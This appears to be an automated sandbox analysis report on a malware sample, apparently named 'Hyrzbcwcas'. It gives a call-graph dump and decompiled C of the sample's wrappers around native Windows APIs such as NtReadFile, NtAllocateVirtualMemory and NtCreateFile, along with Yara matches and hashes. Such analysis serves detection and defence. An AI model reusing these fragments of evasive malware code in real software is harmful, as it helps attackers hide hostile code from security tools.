34099->34100 34101 41ad78 34100->34101 34102 41ac00 LdrLoadDll 34101->34102 34103 41ad81 34102->34103 34104 41ac00 LdrLoadDll 34103->34104 34105 41ad8d 34104->34105 34106 41ac00 LdrLoadDll 34105->34106 34107 41ad96 34106->34107 34108 41ac00 LdrLoadDll 34107->34108 34109 41ad9f 34108->34109 34110 41ac00 LdrLoadDll 34109->34110 34111 41ada8 34110->34111 34112 41ac00 LdrLoadDll 34111->34112 34113 41adb1 34112->34113 34114 41ac00 LdrLoadDll 34113->34114 34115 41adba 34114->34115 34116 41ac00 LdrLoadDll 34115->34116 34117 41adc6 34116->34117 34118 41ac00 LdrLoadDll 34117->34118 34119 41adcf 34118->34119 34120 41ac00 LdrLoadDll 34119->34120 34121 41add8 34120->34121 34122 41ac00 LdrLoadDll 34121->34122 34123 41ade1 34122->34123 34124 41ac00 LdrLoadDll 34123->34124 34125 41adea 34124->34125 34126 41ac00 LdrLoadDll 34125->34126 34127 41adf3 34126->34127 34128 41ac00 LdrLoadDll 34127->34128 34129 41adff 34128->34129 34130 41ac00 LdrLoadDll 34129->34130 34131 41ae08 34130->34131 34132 41ac00 LdrLoadDll 34131->34132 34133 41ae11 34132->34133 34134 41ac00 LdrLoadDll 34133->34134 34135 41ae1a 34134->34135 34136 41ac00 LdrLoadDll 34135->34136 34137 41ae23 34136->34137 34138 41ac00 LdrLoadDll 34137->34138 34139 41ae2c 34138->34139 34140 41ac00 LdrLoadDll 34139->34140 34141 41ae38 34140->34141 34142 41ac00 LdrLoadDll 34141->34142 34143 41ae41 34142->34143 34144 41ac00 LdrLoadDll 34143->34144 34145 41ae4a 34144->34145 34146 41ac00 LdrLoadDll 34145->34146 34147 41ae53 34146->34147 34148 41ac00 LdrLoadDll 34147->34148 34149 41ae5c 34148->34149 34150 41ac00 LdrLoadDll 34149->34150 34151 41ae65 34150->34151 34152 41ac00 LdrLoadDll 34151->34152 34153 41ae71 34152->34153 34154 41ac00 LdrLoadDll 34153->34154 34155 41ae7a 34154->34155 34156 41ac00 LdrLoadDll 34155->34156 34157 41ae83 34156->34157 34158 41ac00 LdrLoadDll 34157->34158 34159 41ae8c 34158->34159 34160 41ac00 LdrLoadDll 34159->34160 34161 41ae95 34160->34161 34162 41ac00 LdrLoadDll 34161->34162 34163 41ae9e 34162->34163 34164 41ac00 LdrLoadDll 34163->34164 34165 41aeaa 34164->34165 34166 41ac00 LdrLoadDll 34165->34166 34167 41aeb3 34166->34167 34168 41ac00 LdrLoadDll 34167->34168 34169 41aebc 34168->34169 34169->33953 34171 41af30 LdrLoadDll 34170->34171 34172 419eac 34171->34172 34201 aa9860 LdrInitializeThunk 34172->34201 34173 419ec3 34173->33873 34175->33950 34177 41a52c NtAllocateVirtualMemory 34176->34177 34178 41af30 LdrLoadDll 34176->34178 34177->34053 34178->34177 34180 41cf20 34179->34180 34181 41cf26 34179->34181 34180->34059 34182 41bf70 2 API calls 34181->34182 34183 41cf4c 34182->34183 34183->34059 34185 41cfd5 34184->34185 34187 41d00d 34184->34187 34186 41bf70 2 API calls 34185->34186 34188 41cfea 34186->34188 34187->34063 34189 41bda0 2 API calls 34188->34189 34189->34187 34190->34070 34191->34072 34192->34074 34193->34077 34194->34079 34196 41ac1b 34195->34196 34197 414e50 LdrLoadDll 34196->34197 34198 41ac3b 34197->34198 34199 414e50 LdrLoadDll 34198->34199 34200 41ace7 34198->34200 34199->34200 34200->34094 34201->34173 34203 aa968f LdrInitializeThunk 34202->34203 34204 aa9681 34202->34204 34203->33959 34204->33959 34206 41af30 LdrLoadDll 34205->34206 34207 41a65c RtlFreeHeap 34206->34207 34207->33963 34209 407eb0 34208->34209 34210 407eab 34208->34210 34211 41bd20 2 API calls 34209->34211 34210->33881 34217 407ed5 34211->34217 34212 407f38 34212->33881 34213 419e90 2 API calls 34213->34217 34214 407f3e 34216 407f64 34214->34216 34218 41a590 2 API calls 34214->34218 34216->33881 34217->34212 34217->34213 34217->34214 34219 41bd20 2 API calls 34217->34219 34224 41a590 34217->34224 34220 407f55 34218->34220 34219->34217 34220->33881 34222 41a590 2 API calls 34221->34222 34223 40817e 34222->34223 34223->33842 34225 41af30 LdrLoadDll 34224->34225 34226 41a5ac 34225->34226 34229 aa96e0 LdrInitializeThunk 34226->34229 34227 41a5c3 34227->34217 34229->34227 34231 41b593 34230->34231 34234 40acf0 34231->34234 34233 409c5b 34233->33850 34236 40ad14 34234->34236 34235 40ad1b 34235->34233 34236->34235 34237 40ad50 LdrLoadDll 34236->34237 34238 40ad67 34236->34238 34237->34238 34238->34233 34240 40b063 34239->34240 34242 40b0e0 34240->34242 34257 419c60 LdrLoadDll 34240->34257 34242->33855 34244 41af30 LdrLoadDll 34243->34244 34245 40f1bb 34244->34245 34245->33863 34246 41a7a0 34245->34246 34247 41af30 LdrLoadDll 34246->34247 34248 41a7bf LookupPrivilegeValueW 34247->34248 34248->33859 34249 41a7f1 34248->34249 34250 41af30 LdrLoadDll 34249->34250 34251 41a7ff 34250->34251 34251->33859 34253 41af30 LdrLoadDll 34252->34253 34254 41a24c 34253->34254 34258 aa9910 LdrInitializeThunk 34254->34258 34255 41a26b 34255->33860 34257->34242 34258->34255 34260 40b1f0 34259->34260 34261 40b040 LdrLoadDll 34260->34261 34262 40b204 34261->34262 34262->33797 34264 40ae4d 34263->34264 34265 40ae51 34263->34265 34264->33800 34266 40ae6a 34265->34266 34267 40ae9c 34265->34267 34309 419ca0 LdrLoadDll 34266->34309 34310 419ca0 LdrLoadDll 34267->34310 34269 40aead 34269->33800 34271 40ae8c 34271->33800 34273 40f4a0 3 API calls 34272->34273 34274 4143c6 34273->34274 34274->33802 34311 4087a0 34275->34311 34278 4087a0 19 API calls 34279 408a8a 34278->34279 34281 408a9d 34279->34281 34329 40f710 10 API calls 34279->34329 34281->33804 34283 41af30 LdrLoadDll 34282->34283 34284 41a4ec 34283->34284 34448 aa98f0 LdrInitializeThunk 34284->34448 34285 40c322 34287 40f4a0 34285->34287 34288 40f4bd 34287->34288 34449 419f90 34288->34449 34291 40f505 34291->33808 34292 419fe0 2 API calls 34293 40f52e 34292->34293 34293->33808 34295 419ffc 34294->34295 34296 41af30 LdrLoadDll 34294->34296 34455 aa9780 LdrInitializeThunk 34295->34455 34296->34295 34297 40c385 34297->33814 34297->33817 34300 41af30 LdrLoadDll 34299->34300 34301 41a04c 34300->34301 34456 aa97a0 LdrInitializeThunk 34301->34456 34302 40c459 34302->33825 34305 41af30 LdrLoadDll 34304->34305 34306 419e0c 34305->34306 34457 aa9a20 LdrInitializeThunk 34306->34457 34307 40c4ac 34307->33829 34309->34271 34310->34269 34312 407ea0 4 API calls 34311->34312 34327 4087ba 34311->34327 34312->34327 34313 408a49 34313->34278 34313->34281 34314 408a3f 34315 408160 2 API calls 34314->34315 34315->34313 34318 419ed0 2 API calls 34318->34327 34320 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 34320->34327 34321 41a460 LdrLoadDll NtClose 34321->34327 34326 419df0 2 API calls 34326->34327 34327->34313 34327->34314 34327->34318 34327->34320 34327->34321 34327->34326 34330 419ce0 34327->34330 34333 4085d0 34327->34333 34345 40f5f0 LdrLoadDll NtClose 34327->34345 34346 419d60 LdrLoadDll 34327->34346 34347 419d90 LdrLoadDll 34327->34347 34348 419e20 LdrLoadDll 34327->34348 34349 4083a0 34327->34349 34365 405f60 LdrLoadDll 34327->34365 34329->34281 34331 41af30 LdrLoadDll 34330->34331 34332 419cfc 34331->34332 34332->34327 34334 4085e6 34333->34334 34366 419850 34334->34366 34336 4085ff 34341 408771 34336->34341 34387 4081a0 34336->34387 34338 4086e5 34339 4083a0 11 API calls 34338->34339 34338->34341 34340 408713 34339->34340 34340->34341 34342 419ed0 2 API calls 34340->34342 34341->34327 34343 408748 34342->34343 34343->34341 34344 41a4d0 2 API calls 34343->34344 34344->34341 34345->34327 34346->34327 34347->34327 34348->34327 34350 4083c9 34349->34350 34427 408310 34350->34427 34353 41a4d0 2 API calls 34354 4083dc 34353->34354 34354->34353 34355 408467 34354->34355 34357 408462 34354->34357 34435 40f670 34354->34435 34355->34327 34356 41a460 2 API calls 34358 40849a 34356->34358 34357->34356 34358->34355 34359 419ce0 LdrLoadDll 34358->34359 34360 4084ff 34359->34360 34360->34355 34439 419d20 34360->34439 34362 408563 34362->34355 34363 414a50 8 API calls 34362->34363 34364 4085b8 34363->34364 34364->34327 34365->34327 34367 41bf70 2 API calls 34366->34367 34368 419867 34367->34368 34394 409310 34368->34394 34370 419882 34371 4198c0 34370->34371 34372 4198a9 34370->34372 34375 41bd20 2 API calls 34371->34375 34373 41bda0 2 API calls 34372->34373 34374 4198b6 34373->34374 34374->34336 34376 4198fa 34375->34376 34377 41bd20 2 API calls 34376->34377 34378 419913 34377->34378 34383 419bb4 34378->34383 34400 41bd60 34378->34400 34381 419ba0 34382 41bda0 2 API calls 34381->34382 34384 419baa 34382->34384 34385 41bda0 2 API calls 34383->34385 34384->34336 34386 419c09 34385->34386 34386->34336 34388 40829f 34387->34388 34389 4081b5 34387->34389 34388->34338 34389->34388 34390 414a50 8 API calls 34389->34390 34392 408222 34390->34392 34391 408249 34391->34338 34392->34391 34393 41bda0 2 API calls 34392->34393 34393->34391 34395 409335 34394->34395 34396 40acf0 LdrLoadDll 34395->34396 34397 409368 34396->34397 34399 40938d 34397->34399 34403 40cf20 34397->34403 34399->34370 34421 41a550 34400->34421 34404 40cf4c 34403->34404 34405 41a1b0 LdrLoadDll 34404->34405 34406 40cf65 34405->34406 34407 40cf6c 34406->34407 34414 41a1f0 34406->34414 34407->34399 34411 40cfa7 34412 41a460 2 API calls 34411->34412 34413 40cfca 34412->34413 34413->34399 34415 41a20c 34414->34415 34416 41af30 LdrLoadDll 34414->34416 34420 aa9710 LdrInitializeThunk 34415->34420 34416->34415 34417 40cf8f 34417->34407 34419 41a7e0 LdrLoadDll 34417->34419 34419->34411 34420->34417 34422 41af30 LdrLoadDll 34421->34422 34423 41a56c 34422->34423 34426 aa9a00 LdrInitializeThunk 34423->34426 34424 419b99 34424->34381 34424->34383 34426->34424 34428 408328 34427->34428 34429 40acf0 LdrLoadDll 34428->34429 34430 408343 34429->34430 34431 414e50 LdrLoadDll 34430->34431 34432 408353 34431->34432 34433 40835c PostThreadMessageW 34432->34433 34434 408370 34432->34434 34433->34434 34434->34354 34436 40f683 34435->34436 34442 419e60 34436->34442 34440 419d3c 34439->34440 34441 41af30 LdrLoadDll 34439->34441 34440->34362 34441->34440 34443 41af30 LdrLoadDll 34442->34443 34444 419e7c 34443->34444 34447 aa9840 LdrInitializeThunk 34444->34447 34445 40f6ae 34445->34354 34447->34445 34448->34285 34450 419fac 34449->34450 34451 41af30 LdrLoadDll 34449->34451 34454 aa99a0 LdrInitializeThunk 34450->34454 34451->34450 34452 40f4fe 34452->34291 34452->34292 34454->34452 34455->34297 34456->34302 34457->34307 34460 aa9540 LdrInitializeThunk

                            Executed Functions

                            Function 0041A3DB, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37filenativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 41a3db-41a429 call 41af30 NtReadFile
                            APIs
                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                            Strings
                            Memory Dump Source
                            • Source File: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_400000_Hyrzbcwcas.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID: 1JA$rMA$rMA
                            • API String ID: 2738559852-782607585
                            • Opcode ID: b54c3958ae1abab019ccd9783c45430143218e71cb73861a855abf43300cd2c9
                            • Instruction ID: b1b2274da202c843c199aaf871e6bf1d1e99413b206f0c07fe2b57a315cb0f00
                            • Opcode Fuzzy Hash: b54c3958ae1abab019ccd9783c45430143218e71cb73861a855abf43300cd2c9
                            • Instruction Fuzzy Hash: FAF0F4B2200108AFCB18CF89CC80EEB77A9EF8C754F118249BA0DD7241C630E811CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A3E0, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3 41a3e0-41a3f6 4 41a3fc-41a429 NtReadFile 3->4 5 41a3f7 call 41af30 3->5 5->4
                            C-Code - Quality: 25%
                            			E0041A3E0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, signed char _a36, void* _a40) {
				void* _v5;
				signed char _t15;
				void* _t19;
				intOrPtr _t21;
				void* _t28;
				intOrPtr* _t29;

				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E0041AF30(_t28, _a4, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t15 = _a36;
				_t6 =  &_a32; // 0x414d72
				_t21 =  *_t6;
				asm("les edx, [edx+edx*2]");
				_t12 =  &_a8; // 0x414d72
				_t19 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28, _t21, _t15 & 0x00000083); // executed
				return _t19;
			}









                            0x0041a3e3
                            0x0041a3ef
                            0x0041a3f7
                            0x0041a3ff
                            0x0041a402
                            0x0041a402
                            0x0041a406
                            0x0041a41d
                            0x0041a425
                            0x0041a429

                            APIs
                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                            Strings
                            Memory Dump Source
                            • Source File: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_400000_Hyrzbcwcas.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID: 1JA$rMA$rMA
                            • API String ID: 2738559852-782607585
                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                            • Instruction ID: c75c44bd16ed9a046d03b4490adc68ebadf214b0f3589fd2ba36fb57c0fad8bd
                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                            • Instruction Fuzzy Hash: 95F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A387, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26filenativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 17 41a387-41a38b 18 41a403-41a429 NtReadFile 17->18 19 41a38e 17->19 19->18
                            C-Code - Quality: 29%
                            			E0041A387(signed int __eax, void* __ecx, intOrPtr* __esi) {
				void* __ebp;
				signed char _t8;
				void* _t12;
				void* _t21;
				void* _t22;

				_t8 = __eax ^ 0x00000091;
				asm("bound esp, [esi]");
				if(_t8 != 0) {
					_t22 = _t21 - 1;
					asm("les edx, [edx+edx*2]");
					_push(_t8 & 0x00000083);
					_push( *((intOrPtr*)(_t22 + 0x20)));
					_push( *((intOrPtr*)(_t22 + 0x1c)));
					_push( *((intOrPtr*)(_t22 + 0x18)));
					_t6 = _t22 + 0xc; // 0x414d72
					_push( *((intOrPtr*)(_t22 + 0x14)));
					_push( *((intOrPtr*)(_t22 + 0x10)));
					_push( *_t6); // executed
					_t12 =  *((intOrPtr*)( *__esi))(); // executed
					return _t12;
				} else {
					return _t8;
				}
			}








                            0x0041a387
                            0x0041a389
                            0x0041a38b
                            0x0041a403
                            0x0041a406
                            0x0041a40c
                            0x0041a414
                            0x0041a418
                            0x0041a41c
                            0x0041a41d
                            0x0041a420
                            0x0041a423
                            0x0041a424
                            0x0041a425
                            0x0041a429
                            0x0041a38e
                            0x0041a38e
                            0x0041a390

                            APIs
                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                            Strings
                            Memory Dump Source
                            • Source File: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_400000_Hyrzbcwcas.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID: rMA$rMA
                            • API String ID: 2738559852-216511022
                            • Opcode ID: 3beebde864bddc8fe2478d90795474c6982e5c4089da105723dad84871a9f1ad
                            • Instruction ID: 8304010f49937db8caef015eb71e6edd3eb905a5ddee519ee8f6c144729166f1
                            • Opcode Fuzzy Hash: 3beebde864bddc8fe2478d90795474c6982e5c4089da105723dad84871a9f1ad
                            • Instruction Fuzzy Hash: D3E0EDB2214009AB8B14DF88D880CEBB3A9FB8C3007108608FA5883100C630E962DB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A330, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 279 41a330-41a381 call 41af30 NtCreateFile
                            C-Code - Quality: 100%
                            			E0041A330(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF30(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                            0x0041a33f
                            0x0041a347
                            0x0041a37d
                            0x0041a381

                            APIs
                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                            Memory Dump Source
                            • Source File: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_400000_Hyrzbcwcas.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                            • Instruction ID: 7ed6e6cb708c972561b0f9910f559a39af1ab3cc862b6eef20835abd22e26781
                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                            • Instruction Fuzzy Hash: C4F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E851CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A50B, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 282 41a50b-41a54d call 41af30 NtAllocateVirtualMemory
                            C-Code - Quality: 58%
                            			E0041A50B(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				0x8b55();
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E0041AF30(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                            0x0041a50b
                            0x0041a513
                            0x0041a51f
                            0x0041a527
                            0x0041a549
                            0x0041a54d

                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                            Memory Dump Source
                            • Source File: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_400000_Hyrzbcwcas.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: ac63e1ff312f8d9b2955ccfcf290add0f48ee18ae22ade3da3512b40bd5b7b87
                            • Instruction ID: fa6ee69f31b3fd6a81802684e9423ad03f865db94f8c8e955cac2f007a93c870
                            • Opcode Fuzzy Hash: ac63e1ff312f8d9b2955ccfcf290add0f48ee18ae22ade3da3512b40bd5b7b87
                            • Instruction Fuzzy Hash: 5DF01CB5210108AFDB14DF99CC81EEB77ADBF8C754F158549FA18A7241C630E811CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A510, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 286 41a510-41a526 287 41a52c-41a54d NtAllocateVirtualMemory 286->287 288 41a527 call 41af30 286->288 288->287
                            C-Code - Quality: 100%
                            			E0041A510(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF30(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                            0x0041a51f
                            0x0041a527
                            0x0041a549
                            0x0041a54d

                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                            Memory Dump Source
                            • Source File: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_400000_Hyrzbcwcas.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                            • Instruction ID: 8b47746d7073478515a2f8fd1fb94e42dcc9ffa91ac9ff965dae3841ed3a313c
                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                            • Instruction Fuzzy Hash: 9CF015B2210208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A45A, Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 289 41a45a-41a45d 290 41a454-41a459 289->290 291 41a45f-41a489 call 41af30 NtClose 289->291
                            C-Code - Quality: 43%
                            			E0041A45A(void* __edx, void* __eflags, long _a4, void* _a8) {
				void* _v117;
				long* __esi;
				intOrPtr* _t6;

				asm("in eax, dx");
				asm("in eax, 0x13");
				if(__eflags <= 0) {
					return  *_t6(__edx);
				} else {
					__eflags = __edx;
					__ebp = __esp;
					__eax = _a4;
					_t3 = __eax + 0x10; // 0x300
					_t4 = __eax + 0xc50; // 0x40a943
					__esi = _t4;
					__eax = E0041AF30(__edi, _a4, __esi,  *_t3, 0, 0x2c);
					__edx = _a8;
					__eax =  *__esi;
					__eax = NtClose(_a8); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}






                            0x0041a45a
                            0x0041a45b
                            0x0041a45d
                            0x0041a459
                            0x0041a45f
                            0x0041a45f
                            0x0041a461
                            0x0041a463
                            0x0041a466
                            0x0041a46f
                            0x0041a46f
                            0x0041a477
                            0x0041a47c
                            0x0041a47f
                            0x0041a485
                            0x0041a487
                            0x0041a488
                            0x0041a489
                            0x0041a489

                            APIs
                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                            Memory Dump Source
                            • Source File: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_400000_Hyrzbcwcas.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: fc464e479884def74782264acedb1f4132a6d83a550a9528cf1dc9a75cb4aba3
                            • Instruction ID: f31503ba9b1e1c32a271491472e21684d6a5e7844ed2701bf49f06805bc22911
                            • Opcode Fuzzy Hash: fc464e479884def74782264acedb1f4132a6d83a550a9528cf1dc9a75cb4aba3
                            • Instruction Fuzzy Hash: DBE0DF76600114ABE720EBE8DCC5EEB7728EF84360F00416AF91CDB202C634E511CA90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A460, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0041A460(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF30(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                            0x0041a463
                            0x0041a466
                            0x0041a46f
                            0x0041a477
                            0x0041a485
                            0x0041a489

                            APIs
                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                            Memory Dump Source
                            • Source File: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_400000_Hyrzbcwcas.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                            • Instruction ID: e9450f8bec15428cdd91297f97b7848412804bda5c7d31b3f0e5b01193c95e83
                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                            • Instruction Fuzzy Hash: 3CD01776211214ABD710EB99CC85EE77BACEF48764F15449ABA189B242C530FA1186E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_a40000_Hyrzbcwcas.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ca9673f3ae0644b396a1594a7c4336876b21773c0ba6c7f527f01b7f528083ec
                            • Instruction ID: 3d1615de6c56f06f0ff5e36b46861abd4723f7fadd185fb075f4862fd2935f2c
                            • Opcode Fuzzy Hash: ca9673f3ae0644b396a1594a7c4336876b21773c0ba6c7f527f01b7f528083ec
                            • Instruction Fuzzy Hash: E190026160100503D24171694404656040ED7D1381F91C032A1014555FDA659992F171
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_a40000_Hyrzbcwcas.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 474b4846cb7e3150ab55ec08d1e9969b35fb9b48e5218bfae338c75501cddc2d
                            • Instruction ID: 6df4891800f47df5f9e08221899be906ae1fcf80be08c15367bcbe41161ac993
                            • Opcode Fuzzy Hash: 474b4846cb7e3150ab55ec08d1e9969b35fb9b48e5218bfae338c75501cddc2d
                            • Instruction Fuzzy Hash: 0590027120100413D25161694504747040DD7D1381F91C432A0414558EE6969952F161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_17_2_a40000_Hyrzbcwcas.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: df0676b926bb5472795a346498651246e71f42d804a780eeda38b72e3b04fadc
                            • Instruction ID: 331cc2321284339b9588ba9105258c812fadb2e59b93484b8013687dd2800182
                            • Opcode Fuzzy Hash: df0676b926bb5472795a346498651246e71f42d804a780eeda38b72e3b04fadc
                            • Instruction Fuzzy Hash: 15900261242041535685B1694404547440AE7E1381B91C032A1404950DD566A856E661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AA99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                            Download Yara Rule
